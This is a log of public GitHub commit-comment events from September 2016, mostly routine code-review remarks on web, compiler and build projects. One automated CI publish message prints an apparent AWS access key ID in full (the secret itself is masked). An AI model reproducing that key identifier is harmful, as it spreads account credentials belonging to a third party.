{"id":"4570523495","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044021,"position":15,"line":15,"path":"server/db/models/review.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:27:26Z","updated_at":"2016-09-15T20:27:26Z","body":"nice use of validate "}},"created_at":"2016-09-15T20:27:26Z"}
{"id":"4570525622","type":"CommitCommentEvent","actor":{"login":"jcalovski"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":19044025,"position":null,"line":null,"path":null,"commit_id":"0f5fd2add8c0d5ceec7689b7ecb2015fb2b92345","created_at":"2016-09-15T20:27:49Z","updated_at":"2016-09-15T20:27:49Z","body":"Interesting I may have another attempt"}},"created_at":"2016-09-15T20:27:49Z"}
{"id":"4570528486","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044033,"position":13,"line":13,"path":"server/app/routes/login.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:28:19Z","updated_at":"2016-09-15T20:28:19Z","body":"Be careful — `express-session` only saves session objects back to the session store at two times:\r\n\r\n1. When the HTTP response is sent (too late here!)\r\n2. When calling `req.session.save()` manually (which you haven't done).\r\n\r\nI recommend moving the `req.session.userId` line *above* the `res.send` line."}},"created_at":"2016-09-15T20:28:19Z"}
{"id":"4570528907","type":"CommitCommentEvent","actor":{"login":"titaschanda"},"repo":{"name":"vasekp/QIClib"},"payload":{"comment":{"id":19044035,"position":null,"line":null,"path":null,"commit_id":"7798d57507c166b964ac41ce14d7bf64b71573ea","created_at":"2016-09-15T20:28:23Z","updated_at":"2016-09-15T20:28:23Z","body":"Can you please pull request your changes to the devel branch? It would be great."}},"created_at":"2016-09-15T20:28:23Z"}
{"id":"4570530886","type":"CommitCommentEvent","actor":{"login":"BrightspaceGitHubReader"},"repo":{"name":"Brightspace/ifrau"},"payload":{"comment":{"id":19044044,"position":null,"line":null,"path":null,"commit_id":"47ca5d583adea1fa1157b936aba20a98837496e8","created_at":"2016-09-15T20:28:42Z","updated_at":"2016-09-15T20:28:42Z","body":"Publish options:\n\n   Target directory: ifrau\n   Module type: lib\n   Files: ./dist/**/*.js\n   Publish key: AKIAIFWDFE37W7LZ52XQ\n   Publish secret: [secret]\n   Dev tag: undefined\n   Version: v0.18.0\n\nPublished to:\n\n   https://s.brightspace.com/lib/ifrau/0.18.0/\n\n[20:28:42] [SUCCESS] /home/travis/build/Brightspace/ifrau/dist/ifrau/client.js.gz -> lib/ifrau/0.18.0/ifrau/client.js\n[20:28:42] [SUCCESS] /home/travis/build/Brightspace/ifrau/dist/ifrau/host.js.gz -> lib/ifrau/0.18.0/ifrau/host.js\n[20:28:42] [SUCCESS] /home/travis/build/Brightspace/ifrau/dist/ifrau.js.gz -> lib/ifrau/0.18.0/ifrau.js\n"}},"created_at":"2016-09-15T20:28:42Z"}
{"id":"4570533878","type":"CommitCommentEvent","actor":{"login":"OxiKlein"},"repo":{"name":"OxiKlein/Tease-AI"},"payload":{"comment":{"id":19044050,"position":null,"line":null,"path":null,"commit_id":"fd5c08acd4fb4cff3ce8a0960394a5f8cfae86ac","created_at":"2016-09-15T20:29:13Z","updated_at":"2016-09-15T20:29:13Z","body":"Merging changes caused addition artifacts in my local codebase. I had hoped reverting the merge and re-merging would fix the problem but apparently not. Now I have a bunch of useless extra commits..."}},"created_at":"2016-09-15T20:29:13Z"}
{"id":"4570534460","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexor-game/visualisations"},"payload":{"comment":{"id":19044052,"position":null,"line":null,"path":null,"commit_id":"e46489c64f4177c4574b1c66c084d311da1e907a","created_at":"2016-09-15T20:29:19Z","updated_at":"2016-09-15T20:29:19Z","body":"[see this](https://github.com/inexor-game/code/issues/322)"}},"created_at":"2016-09-15T20:29:19Z"}
{"id":"4570537950","type":"CommitCommentEvent","actor":{"login":"ChALkeR"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19044064,"position":214,"line":246,"path":"doc/api/buffer.md","commit_id":"cc1318b5ed1ec67ae78afde70d52cbea794e3bad","created_at":"2016-09-15T20:29:54Z","updated_at":"2016-09-15T20:29:54Z","body":"Removing `[]` reverted in #8553."}},"created_at":"2016-09-15T20:29:54Z"}
{"id":"4570537957","type":"CommitCommentEvent","actor":{"login":"iurevych"},"repo":{"name":"talkable/talkable-docs"},"payload":{"comment":{"id":19044065,"position":5,"line":117,"path":"saas.html","commit_id":"13e0dce939889e5e242820023ddc6819a5babad2","created_at":"2016-09-15T20:29:55Z","updated_at":"2016-09-15T20:29:55Z","body":"@vitalikdanchenko can you get it back to `2.3.2` please? We're not yet ready to make use of `3.0.0`"}},"created_at":"2016-09-15T20:29:55Z"}
{"id":"4570538198","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044066,"position":10,"line":10,"path":"server/db/models/order.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:29:58Z","updated_at":"2016-09-15T20:29:58Z","body":"nice use of ENUM"}},"created_at":"2016-09-15T20:29:58Z"}
{"id":"4570539697","type":"CommitCommentEvent","actor":{"login":"spikebrehm"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19044071,"position":14,"line":211,"path":"package.json","commit_id":"7655e537ed3840a5376ecdf1e7cde195866fecc7","created_at":"2016-09-15T20:30:14Z","updated_at":"2016-09-15T20:30:14Z","body":"Can this just be 15.3.1 now?"}},"created_at":"2016-09-15T20:30:14Z"}
{"id":"4570540968","type":"CommitCommentEvent","actor":{"login":"boydzweers"},"repo":{"name":"boydzweers/new_test"},"payload":{"comment":{"id":19044078,"position":9,"line":9,"path":"README.md","commit_id":"578e5678687bc5ac96f61c64a1bfdbf17a30e21a","created_at":"2016-09-15T20:30:27Z","updated_at":"2016-09-15T20:30:27Z","body":"Wat deed deze regel?"}},"created_at":"2016-09-15T20:30:27Z"}
{"id":"4570541257","type":"CommitCommentEvent","actor":{"login":"rgesulfo"},"repo":{"name":"rgesulfo/email_template"},"payload":{"comment":{"id":19044080,"position":6,"line":11,"path":"dist/email_template.html","commit_id":"85d7ef58a794dc7aa10cbf4bbeb653644832280c","created_at":"2016-09-15T20:30:30Z","updated_at":"2016-09-15T20:30:30Z","body":"@alrajhi-fares So body should be 100%, but the main table should have the max-width. That's right?"}},"created_at":"2016-09-15T20:30:30Z"}
{"id":"4570541975","type":"CommitCommentEvent","actor":{"login":"xtpclark"},"repo":{"name":"elipup/xtuple-utility"},"payload":{"comment":{"id":19044082,"position":9,"line":415,"path":"postgresql.sh","commit_id":"f139c540e22e802aea1f1eecc87f51142a80e548","created_at":"2016-09-15T20:30:37Z","updated_at":"2016-09-15T20:30:37Z","body":"Need to set the PGPORT.  Don't see where we do that.\r\nMost installations will have a single postgres already existing typically on 5432, if we want to install ecommerce cluster someplace elese, we need to specify a new port."}},"created_at":"2016-09-15T20:30:37Z"}
{"id":"4570543090","type":"CommitCommentEvent","actor":{"login":"OxiKlein"},"repo":{"name":"OxiKlein/Tease-AI"},"payload":{"comment":{"id":19044086,"position":null,"line":null,"path":null,"commit_id":"9ec0dcb0b843dd9d1445f5390a6662f40039fa6c","created_at":"2016-09-15T20:30:48Z","updated_at":"2016-09-15T20:30:48Z","body":"Code artifacts are now gone from local repo and this master. The last few commits are useless."}},"created_at":"2016-09-15T20:30:48Z"}
{"id":"4570543099","type":"CommitCommentEvent","actor":{"login":"boydzweers"},"repo":{"name":"boydzweers/new_test"},"payload":{"comment":{"id":19044087,"position":9,"line":9,"path":"README.md","commit_id":"578e5678687bc5ac96f61c64a1bfdbf17a30e21a","created_at":"2016-09-15T20:30:48Z","updated_at":"2016-09-15T20:30:48Z","body":"Niets bijzonders"}},"created_at":"2016-09-15T20:30:48Z"}
{"id":"4570544654","type":"CommitCommentEvent","actor":{"login":"rgesulfo"},"repo":{"name":"rgesulfo/email_template"},"payload":{"comment":{"id":19044096,"position":27,"line":29,"path":"dist/email_template.html","commit_id":"85d7ef58a794dc7aa10cbf4bbeb653644832280c","created_at":"2016-09-15T20:31:05Z","updated_at":"2016-09-15T20:31:05Z","body":"@alrajhi-fares Why the img should have a max-width of 100%?"}},"created_at":"2016-09-15T20:31:05Z"}
{"id":"4570544833","type":"CommitCommentEvent","actor":{"login":"boydzweers"},"repo":{"name":"boydzweers/new_test"},"payload":{"comment":{"id":19044097,"position":11,"line":1,"path":"README.md","commit_id":"578e5678687bc5ac96f61c64a1bfdbf17a30e21a","created_at":"2016-09-15T20:31:07Z","updated_at":"2016-09-15T20:31:07Z","body":"daarvoor is deze gekomen"}},"created_at":"2016-09-15T20:31:07Z"}
{"id":"4570544971","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044098,"position":19,"line":19,"path":"server/app/routes/login.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:31:09Z","updated_at":"2016-09-15T20:31:09Z","body":"Consider refactoring multifaceted if-else nesting — you can often flatten the logic with some boolean trickery and `return` statements. For example,\r\n\r\n```js\r\nif (!user) return res.status(401).send(\"User not found\") // everything below is an implicit \"else\"\r\nif (user.correctPassword(foo)) { /*.. etc. ...*/ }\r\n```\r\n\r\nThe above isn't incontrovertibly better — just something to keep in mind."}},"created_at":"2016-09-15T20:31:09Z"}
{"id":"4570548517","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044106,"position":24,"line":24,"path":"server/db/models/products.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:31:44Z","updated_at":"2016-09-15T20:31:44Z","body":"may be use Sequelize.INTEGER ???"}},"created_at":"2016-09-15T20:31:44Z"}
{"id":"4570548882","type":"CommitCommentEvent","actor":{"login":"adelnizamutdinov"},"repo":{"name":"adelnizamutdinov/tinyrenderer"},"payload":{"comment":{"id":19044107,"position":null,"line":null,"path":null,"commit_id":"26d3d6467f7dd6c3bb5e1c613d15083f77b2459a","created_at":"2016-09-15T20:31:47Z","updated_at":"2016-09-15T20:31:47Z","body":"this change is brought to you by @nextel"}},"created_at":"2016-09-15T20:31:47Z"}
{"id":"4570550879","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044113,"position":5,"line":5,"path":"server/app/routes/logout.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:32:09Z","updated_at":"2016-09-15T20:32:09Z","body":"Might also use a `204` (no content) — we just need to signal success, don't need to use extra bandwidth for a string."}},"created_at":"2016-09-15T20:32:09Z"}
{"id":"4570552758","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"palvaro/CMPS232-Fall16"},"payload":{"comment":{"id":19044119,"position":45,"line":12,"path":"readings.md","commit_id":"c6c26824edd2164d30fcb616fed7c7a36ef9ba7d","created_at":"2016-09-15T20:32:26Z","updated_at":"2016-09-15T20:32:26Z","body":"The link for Raft is pointing to paxos made simple. And using markdown syntax like `[Raft](https://raft.github.io/raft.pdf)`  is cleaner than raw html."}},"created_at":"2016-09-15T20:32:26Z"}
{"id":"4570552814","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"thc202/zaproxy"},"payload":{"comment":{"id":19044121,"position":null,"line":null,"path":null,"commit_id":"75d94411f14209db272dc05b4cd73ae2de9ce466","created_at":"2016-09-15T20:32:26Z","updated_at":"2016-09-15T20:32:26Z","body":"Looks good "}},"created_at":"2016-09-15T20:32:26Z"}
{"id":"4570554558","type":"CommitCommentEvent","actor":{"login":"keithsw1111"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":19044129,"position":null,"line":null,"path":null,"commit_id":"9a1aaecf4406bf252c113086c1d9597b94230449","created_at":"2016-09-15T20:32:44Z","updated_at":"2016-09-15T20:32:44Z","body":"That would require a custom dialog ... I also think adding multiple rows above is a rare event compared to adding them below ... and if you really want to add them above it is only slightly more difficult to do."}},"created_at":"2016-09-15T20:32:44Z"}
{"id":"4570556382","type":"CommitCommentEvent","actor":{"login":"nirvdrum"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19044132,"position":66,"line":66,"path":"truffle/src/main/java/org/jruby/truffle/core/rope/NativeRope.java","commit_id":"58e79d5c48a6bd4135b59bf8701e4693b95a11f2","created_at":"2016-09-15T20:33:02Z","updated_at":"2016-09-15T20:33:02Z","body":"I don't have a good answer there. If we make the field non-final or the call virtual, we'll end up affecting performance."}},"created_at":"2016-09-15T20:33:02Z"}
{"id":"4570556529","type":"CommitCommentEvent","actor":{"login":"leodemoura"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19044135,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T20:33:04Z","updated_at":"2016-09-15T20:33:04Z","body":"@fpvandoorn we have considered this possibility (using projections), but it is a lot of extra code. Right now, the current `let`+pattern is just notation on top of the equation compiler. The equation compiler is doing all the heavy lifting when the pattern has several nested patterns, inaccessible term annotations, and dependent elimination (Example: `let (sigma.mk x (exists.intro y Hyx), sigma.mk .x rfl) := ... in ...`). For sure, I will not invest time on a different compilation strategy for the `let`+patterns expression. If it is too weird, then let's delete the feature. "}},"created_at":"2016-09-15T20:33:04Z"}
{"id":"4570559208","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":19044142,"position":null,"line":null,"path":null,"commit_id":"2461f4f676d22df81fef3c4be832e4920777f7f1","created_at":"2016-09-15T20:33:30Z","updated_at":"2016-09-15T20:33:30Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;700KXuBe&#x2F;10-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Authentication</a>"}},"created_at":"2016-09-15T20:33:30Z"}
{"id":"4570559903","type":"CommitCommentEvent","actor":{"login":"jingai"},"repo":{"name":"jingai/skin.metropolis"},"payload":{"comment":{"id":19044146,"position":null,"line":null,"path":null,"commit_id":"864a5d3423c9aa7b9698e7c20245e88dcbd41c34","created_at":"2016-09-15T20:33:38Z","updated_at":"2016-09-15T20:33:38Z","body":"It wasn't my intention to remove any features.  I was just removing the option, since I saw no real reason to ever disable it.\r\n\r\nIf I broke something, I'll fix it tomorrow :)"}},"created_at":"2016-09-15T20:33:38Z"}
{"id":"4570560123","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044147,"position":14,"line":14,"path":"server/app/routes/products/index.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:33:40Z","updated_at":"2016-09-15T20:33:40Z","body":"Express defaults to `200`. Nothing wrong with being explicit, just an FYI."}},"created_at":"2016-09-15T20:33:40Z"}
{"id":"4570562370","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19044155,"position":66,"line":66,"path":"truffle/src/main/java/org/jruby/truffle/core/rope/NativeRope.java","commit_id":"58e79d5c48a6bd4135b59bf8701e4693b95a11f2","created_at":"2016-09-15T20:34:05Z","updated_at":"2016-09-15T20:34:05Z","body":"Hmmm... ok we'll have to have a think about this."}},"created_at":"2016-09-15T20:34:05Z"}
{"id":"4570566696","type":"CommitCommentEvent","actor":{"login":"algorythmntrader"},"repo":{"name":"algorythmntrader/ProjectAlpha"},"payload":{"comment":{"id":19044169,"position":null,"line":null,"path":null,"commit_id":"c37e34fb423edd174f23f20061ab140f22b5e8e1","created_at":"2016-09-15T20:34:52Z","updated_at":"2016-09-15T20:34:52Z","body":"example file, need your modification!!!"}},"created_at":"2016-09-15T20:34:52Z"}
{"id":"4570568019","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"palvaro/CMPS232-Fall16"},"payload":{"comment":{"id":19044171,"position":37,"line":4,"path":"readings.md","commit_id":"c6c26824edd2164d30fcb616fed7c7a36ef9ba7d","created_at":"2016-09-15T20:35:07Z","updated_at":"2016-09-15T20:35:07Z","body":"Is this link left blank on purpose? http://research.microsoft.com/en-us/um/people/lamport/pubs/time-clocks.pdf"}},"created_at":"2016-09-15T20:35:07Z"}
{"id":"4570577049","type":"CommitCommentEvent","actor":{"login":"DaironBautista"},"repo":{"name":"DaironBautista/Goolazo"},"payload":{"comment":{"id":19044194,"position":null,"line":null,"path":null,"commit_id":"4e44986b9791331550a4b9299c0a9a6c6ae1060a","created_at":"2016-09-15T20:36:45Z","updated_at":"2016-09-15T20:36:45Z","body":"mesclar"}},"created_at":"2016-09-15T20:36:45Z"}
{"id":"4570579853","type":"CommitCommentEvent","actor":{"login":"pedro-andrade-inpe"},"repo":{"name":"TerraME/terrame"},"payload":{"comment":{"id":19044199,"position":null,"line":null,"path":null,"commit_id":"13a5115548d42a0c077866cfe018c9c55d886d51","created_at":"2016-09-15T20:37:15Z","updated_at":"2016-09-15T20:37:15Z","body":"In fact, this issue closes #1405."}},"created_at":"2016-09-15T20:37:15Z"}
{"id":"4570581717","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19044205,"position":null,"line":null,"path":null,"commit_id":"f3d833c73da9e062d4a904c4e13e90e68b28ddfd","created_at":"2016-09-15T20:37:32Z","updated_at":"2016-09-15T20:37:32Z","body":"fast-forwarding develop-2.2 to borshop-integration-858-fd-revert-caps-cherrypick = 3e66cd4f"}},"created_at":"2016-09-15T20:37:32Z"}
{"id":"4570583750","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":19044209,"position":null,"line":null,"path":null,"commit_id":"62c6605781a278356236db8e58ea0cd8913e569a","created_at":"2016-09-15T20:37:53Z","updated_at":"2016-09-15T20:37:53Z","body":"Yeah i know , its good point to finsly upfate to 2.1.0 with those changes and focus on moving thing out of plugin into service \n\nOn September 15, 2016 7:47:43 PM GMT+02:00, da3dsoul <notifications@github.com> wrote:\n>Well it was half there already. We can make a separate branch from the\n>commit before if we really need to, but there will be no way to keep\n>this back compatible without making everything twice\n>\n>-- \n>You are receiving this because you commented.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/bigretromike/nakamori/commit/62c6605781a278356236db8e58ea0cd8913e569a#commitcomment-19041014\n\n-- \nSent from my Android device with K-9 Mail. Please excuse my brevity."}},"created_at":"2016-09-15T20:37:53Z"}
{"id":"4570584047","type":"CommitCommentEvent","actor":{"login":"cdv-dev"},"repo":{"name":"CrossMiron/My_work"},"payload":{"comment":{"id":19044213,"position":31,"line":31,"path":"app/src/main/res/layout/activity_main.xml","commit_id":"a88108f377676b557c74cefecccfad91aca6c34b","created_at":"2016-09-15T20:37:57Z","updated_at":"2016-09-15T20:37:57Z","body":"paddingTop тут не уместен. AppBarLayout может иметь другую высоту. Тут нужно добавлять атрибут app:layout_behavior=\"@string/appbar_scrolling_view_behavior\" и тогда твой контент всегда будет под AppBarLayout . Для этого и придумали CoordinatorLayout, чтоб скоординировать между собой view, находящиеся в нем"}},"created_at":"2016-09-15T20:37:57Z"}
{"id":"4570585016","type":"CommitCommentEvent","actor":{"login":"JanTvrdik"},"repo":{"name":"nextras/orm"},"payload":{"comment":{"id":19044220,"position":17,"line":369,"path":"src/Entity/Reflection/MetadataParser.php","commit_id":"915acb14a8097def14716a0260af50cd318f650b","created_at":"2016-09-15T20:38:08Z","updated_at":"2016-09-15T20:38:08Z","body":"Can be simplified to `$order = $args['orderBy']` (or maybe `$order = $args['orderBy'] + $order`)\r\n"}},"created_at":"2016-09-15T20:38:08Z"}
{"id":"4570593203","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19044237,"position":null,"line":null,"path":null,"commit_id":"6c049e248ca4f018d9e520413b9ea6fafb7867f8","created_at":"2016-09-15T20:39:34Z","updated_at":"2016-09-15T20:39:34Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=71)"}},"created_at":"2016-09-15T20:39:34Z"}
{"id":"4570593224","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19044238,"position":null,"line":null,"path":null,"commit_id":"c97370a01fbb97989ad72557d9eba6b96933576a","created_at":"2016-09-15T20:39:34Z","updated_at":"2016-09-15T20:39:34Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=71)"}},"created_at":"2016-09-15T20:39:34Z"}
{"id":"4570593313","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19044240,"position":null,"line":null,"path":null,"commit_id":"72a4c84dd25ce651ec396052fdfafae125bfc779","created_at":"2016-09-15T20:39:35Z","updated_at":"2016-09-15T20:39:35Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=71)"}},"created_at":"2016-09-15T20:39:35Z"}
{"id":"4570593558","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19044241,"position":null,"line":null,"path":null,"commit_id":"ea53f8f4c2f8a222d87110993159d706f321a34c","created_at":"2016-09-15T20:39:38Z","updated_at":"2016-09-15T20:39:38Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=71)"}},"created_at":"2016-09-15T20:39:38Z"}
{"id":"4570593598","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19044242,"position":null,"line":null,"path":null,"commit_id":"d8e764516994901ae158647d3aa18a0d7b96cd3c","created_at":"2016-09-15T20:39:38Z","updated_at":"2016-09-15T20:39:38Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=71)"}},"created_at":"2016-09-15T20:39:38Z"}
{"id":"4570595748","type":"CommitCommentEvent","actor":{"login":"ShatteredMotion"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19044247,"position":34,"line":62,"path":"files/lib/data/package/PackageCache.class.php","commit_id":"3b1f0c53fb4fc70e869f2891cf0ddcafca5c4322","created_at":"2016-09-15T20:40:01Z","updated_at":"2016-09-15T20:40:01Z","body":"That looks wrong 😉 "}},"created_at":"2016-09-15T20:40:01Z"}
{"id":"4570599065","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044257,"position":13,"line":13,"path":"server/db/models/products.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:40:37Z","updated_at":"2016-09-15T20:40:37Z","body":"it is a good practice to save the price in cents and may be as integer rather than in dollar amount with decimals. You can convert the price to dollar amount on a backend. Storing money as cents potentially simplifies calculations and makes the end value precise. "}},"created_at":"2016-09-15T20:40:37Z"}
{"id":"4570600188","type":"CommitCommentEvent","actor":{"login":"ShatteredMotion"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19044258,"position":51,"line":79,"path":"files/lib/data/package/PackageCache.class.php","commit_id":"3b1f0c53fb4fc70e869f2891cf0ddcafca5c4322","created_at":"2016-09-15T20:40:48Z","updated_at":"2016-09-15T20:40:48Z","body":"For what the `empty` check? Btw `null` is considered to be empty"}},"created_at":"2016-09-15T20:40:48Z"}
{"id":"4570604982","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044270,"position":22,"line":22,"path":"server/app/routes/products/index.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:41:41Z","updated_at":"2016-09-15T20:41:41Z","body":"nice use of Sequelize instance methods!"}},"created_at":"2016-09-15T20:41:41Z"}
{"id":"4570609774","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19044277,"position":null,"line":null,"path":null,"commit_id":"8948a75ae025728ee89296e8122ffd3450bc7549","created_at":"2016-09-15T20:42:36Z","updated_at":"2016-09-15T20:42:36Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/475/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T20:42:36Z"}
{"id":"4570610817","type":"CommitCommentEvent","actor":{"login":"feeley"},"repo":{"name":"gambit/gambit"},"payload":{"comment":{"id":19044281,"position":null,"line":null,"path":null,"commit_id":"9c5e9dabdf3f3d766dfd2c0e98d459e2e40a1207","created_at":"2016-09-15T20:42:48Z","updated_at":"2016-09-15T20:42:48Z","body":"Have you measured performance with your fix?  It would be better to use a macro instead of the ```##hash-combine``` function."}},"created_at":"2016-09-15T20:42:48Z"}
{"id":"4570612678","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044289,"position":null,"line":null,"path":null,"commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:43:10Z","updated_at":"2016-09-15T20:43:10Z","body":"I generally enjoyed reading the code. Beautiful job girls :)"}},"created_at":"2016-09-15T20:43:10Z"}
{"id":"4570613511","type":"CommitCommentEvent","actor":{"login":"ShatteredMotion"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19044290,"position":54,"line":82,"path":"files/lib/data/package/PackageCache.class.php","commit_id":"3b1f0c53fb4fc70e869f2891cf0ddcafca5c4322","created_at":"2016-09-15T20:43:19Z","updated_at":"2016-09-15T20:43:19Z","body":"```php\r\nreturn $this->getPackage($packageID);\r\n```\r\n\r\nNo need for the extra singleton call."}},"created_at":"2016-09-15T20:43:19Z"}
{"id":"4570616622","type":"CommitCommentEvent","actor":{"login":"JasonData3"},"repo":{"name":"JasonData3/ProgrammingAssignment2"},"payload":{"comment":{"id":19044305,"position":null,"line":null,"path":null,"commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-15T20:43:54Z","updated_at":"2016-09-15T20:43:54Z","body":"A pair of functions that cache the inverse of a matrix."}},"created_at":"2016-09-15T20:43:54Z"}
{"id":"4570620076","type":"CommitCommentEvent","actor":{"login":"bascht"},"repo":{"name":"rubyberlin/rubyberlin.org"},"payload":{"comment":{"id":19044316,"position":null,"line":null,"path":null,"commit_id":"37dc78550dbfea5c8682062874dcc9b1f24151ff","created_at":"2016-09-15T20:44:33Z","updated_at":"2016-09-15T20:44:33Z","body":"Dang it. :D Heroku?"}},"created_at":"2016-09-15T20:44:33Z"}
{"id":"4570622843","type":"CommitCommentEvent","actor":{"login":"nirvdrum"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19044324,"position":66,"line":66,"path":"truffle/src/main/java/org/jruby/truffle/core/rope/NativeRope.java","commit_id":"58e79d5c48a6bd4135b59bf8701e4693b95a11f2","created_at":"2016-09-15T20:45:02Z","updated_at":"2016-09-15T20:45:02Z","body":"I suppose the right answer is to have a node for reading the character length and then specializing on the rope type. It could be tedious for some API usages, but would probably give us what we want."}},"created_at":"2016-09-15T20:45:02Z"}
{"id":"4570623316","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19044325,"position":null,"line":null,"path":null,"commit_id":"50606722091f844d3652f40d6af0b286ccd33c40","created_at":"2016-09-15T20:45:09Z","updated_at":"2016-09-15T20:45:09Z","body":"FixTransitionRules (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2330 of 2330 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T20:45:09Z"}
{"id":"4570623495","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044326,"position":22,"line":22,"path":"server/app/routes/products/index.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:45:11Z","updated_at":"2016-09-15T20:45:11Z","body":"...though I'm not sure why you can't post a product with categories pre-set? That would be slightly more RESTful (instead of posting a wrapper object with both product and categories). I assume it has to do with the vagaries of when ids are created — I'll check on this with you in person during CR."}},"created_at":"2016-09-15T20:45:11Z"}
